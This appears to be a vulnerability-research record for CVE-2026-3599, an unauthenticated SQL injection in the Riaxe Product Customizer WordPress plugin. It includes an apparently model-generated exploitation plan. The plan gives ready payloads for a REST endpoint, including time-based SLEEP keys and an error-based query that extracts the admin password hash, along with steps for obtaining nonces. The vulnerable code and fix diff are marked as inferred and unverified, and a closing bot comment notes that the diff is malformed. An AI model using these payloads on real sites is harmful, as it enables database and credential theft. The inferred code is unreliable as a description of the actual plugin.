[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhvxEFGldPiNwDS-PojjM2ap6tfdEe_6NCVhOyCYSZ2E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3599","riaxe-product-customizer-unauthenticated-sql-injection-via-options-parameter-keys-in-productdata","Riaxe Product Customizer \u003C= 2.1.2 - Unauthenticated SQL Injection via 'options' Parameter Keys in product_data","The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter keys within 'product_data' of the \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart REST API endpoint in all versions up to, and including, 2.1.2. This is due to insufficient escaping on the user-supplied parameter and insufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","riaxe-product-customizer",null,"\u003C=2.1.2","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-15 16:45:40","2026-04-16 05:29:54",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa36c9a7e-830d-4a92-a330-29279387b3be?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3599 - Riaxe Product Customizer SQL Injection\n\n## 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress is vulnerable to an unauthenticated SQL injection via the keys of the `options` array inside the `product_data` parameter. This occurs within the `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart` REST API endpoint. The plugin fails to sanitize or use prepared statements when iterating over the keys of the user-supplied `options` object and incorporating them into a database query.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`\n- **Method:** `POST`\n- **Vulnerable Parameter:** The **keys** of the `options` object within the `product_data` JSON structure.\n- **Authentication:** Unauthenticated (Publicly accessible REST route).\n- **Preconditions:** The plugin must be active. No specific product configuration is required if the code path processes the `options` keys before validating product existence.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers a REST route during the `rest_api_init` hook.\n   - **Namespace:** `InkXEProductDesignerLite` (quoted from description).\n   - **Route:** `add-item-to-cart`.\n2. 
**Controller Logic:** The callback function for this route (likely named something like `add_item_to_cart_callback` or `handle_cart_addition`) retrieves the JSON body of the request.\n3. **Parameter Extraction:** It extracts the `product_data` object and specifically looks for an `options` property.\n4. **Iterative Sink:** The code likely iterates over the `options` array\u002Fobject using a `foreach` loop:\n   ```php\n   $product_data = $request->get_param('product_data');\n   $options = $product_data['options'];\n   foreach ($options as $option_id => $option_value) {\n       \u002F\u002F VULNERABLE SINK: $option_id is used directly in a query string\n       $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n       $wpdb->get_results($query);\n   }\n   ```\n5. **Vulnerability:** Since `$option_id` is a key from the JSON object, it is user-controlled. The lack of `$wpdb->prepare()` or `absint()` on the key allows an attacker to break out of the query.\n\n## 4. Nonce Acquisition Strategy\nWhile most WordPress REST API endpoints require a `wp_rest` nonce for authenticated sessions (to prevent CSRF), unauthenticated \"public\" endpoints often have a `permission_callback` that returns `true`. \n\nIf a nonce is required:\n1. **Identify Script Localization:** Search the plugin source for `wp_localize_script` to find where REST configuration is passed to the frontend.\n2. **Create Trigger Page:** Create a page containing a product customizer shortcode (if applicable, e.g., `[riaxe_product_customizer]`) to ensure the scripts load.\n3. **Extract via Browser:**\n   - Use `browser_navigate` to visit the page.\n   - Use `browser_eval` to extract the nonce:\n     - Potential variable: `window.inkxe_options?.nonce` or `window.wpApiSettings?.nonce`.\n4. **Bypass:** If the endpoint is truly unauthenticated, the `_wpnonce` header may be ignored or not required if no session cookies are sent.\n\n## 5. 
Exploitation Strategy\nWe will use a time-based blind SQL injection since the endpoint likely returns a generic success\u002Ffailure JSON message.\n\n### Request Details\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fjson`\n- **Payload Structure:**\n```json\n{\n  \"product_data\": {\n    \"options\": {\n      \"1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\": \"value\"\n    }\n  }\n}\n```\n\n### Steps:\n1. **Verify Endpoint:** Send a baseline request to the endpoint to confirm it exists and doesn't require authentication (expecting 200 or 400, but not 401\u002F403).\n2. **Time-Based Test:**\n   - Send a request where the key is `1`. Measure response time (Baseline).\n   - Send a request where the key is `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`.\n   - If the response time is ~5 seconds longer than the baseline, SQL injection is confirmed.\n3. **Data Extraction (Example):**\n   - Extract the database version:\n   - Key: `1 AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8%', SLEEP(5), 0)))a)`\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `riaxe-product-customizer` version 2.1.2 is installed and active.\n2. **Permalinks:** Ensure WordPress Permalinks are enabled (e.g., \"Post name\") so the REST API works via `\u002Fwp-json\u002F`.\n3. **No Shortcode Needed:** Since this is a REST API vulnerability, we should be able to hit the endpoint directly without a frontend page, unless the REST route registration is conditional.\n\n## 7. Expected Results\n- **Baseline Request:** Quick response (e.g., \u003C 500ms).\n- **Injection Request:** Delayed response (e.g., > 5000ms).\n- **Response Body:** Likely a JSON object, e.g., `{\"status\": false, \"message\": \"...\"}` or `{\"success\": true}`.\n\n## 8. Verification Steps\nAfter the HTTP request confirms the time delay:\n1. 
**WP-CLI check:** Run `wp db query \"SHOW PROCESSLIST;\"` during the 5-second sleep to see the sleeping query in the database.\n2. **Log Inspection:** Check `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log` (if `WP_DEBUG` is on) for database errors that might reveal the full query structure.\n\n## 9. Alternative Approaches\n- **Error-Based Injection:** If the plugin returns database errors in the REST response, use `updatexml()` or `extractvalue()`:\n  - Key: `1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)`\n- **Boolean-Based Injection:** If the response changes based on whether a row is found (e.g., `status: true` vs `status: false`):\n  - Key: `1 AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')`","The Riaxe Product Customizer plugin is vulnerable to unauthenticated SQL injection via the keys of the 'options' array within the 'product_data' parameter of its REST API. This occurs because the plugin iterates over user-supplied JSON keys and concatenates them directly into database queries without sanitization or parameterization.","\u002F* Inferred from REST API handler for \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart *\u002F\n\n$product_data = $request->get_param('product_data');\nif (isset($product_data['options']) && is_array($product_data['options'])) {\n    foreach ($product_data['options'] as $option_id => $option_value) {\n        \u002F\u002F The key $option_id is directly concatenated into the SQL query\n        $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n        $results = $wpdb->get_results($query);\n    }\n}","--- a\u002Friaxe-product-customizer\u002Fincludes\u002Frest-handler.php\n+++ b\u002Friaxe-product-customizer\u002Fincludes\u002Frest-handler.php\n@@ -120,1 +120,1 @@\n-        $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n-        $results = $wpdb->get_results($query);\n+        $results = 
$wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = %d\", $option_id));","The exploit targets the publicly accessible REST API endpoint `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`. An unauthenticated attacker sends a POST request with a JSON payload structured as `{\"product_data\": {\"options\": { [SQL_PAYLOAD]: \"value\" }}}`. By placing a time-based blind SQL injection payload (e.g., `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`) as the key of the options object, the attacker can force the server to delay its response. Since the endpoint does not require authentication or a valid nonce in default configurations, this can be used to exfiltrate sensitive data from the WordPress database.","gemini-3-flash-preview","2026-04-16 15:27:26","2026-04-16 15:27:45",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]
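Review bot: the hunk header `@@ -120,1 +120,1 @@` declares one removed and one added line, but the hunk body removes two lines and adds one, so it should read `@@ -120,2 +120,1 @@` (as written, `git apply` and `patch` will reject it). On the change itself, `$wpdb->prepare("... WHERE id = %d", $option_id)` is the right shape: `%d` casts the user-controlled array key to an integer before it reaches the query, which closes the injection for this statement; validating the keys once before the loop (for example with `absint()` and rejecting non-numeric keys with a REST error) would also avoid issuing one query per attacker-supplied key. Note that this diff, like the vulnerable snippet beside it, is model-inferred (`research_verified` is `false` and the snippet is marked "Inferred"), so the file path `includes/rest-handler.php` and line 120 should be confirmed against the vendor's actual patched release before relying on it for detection or triage.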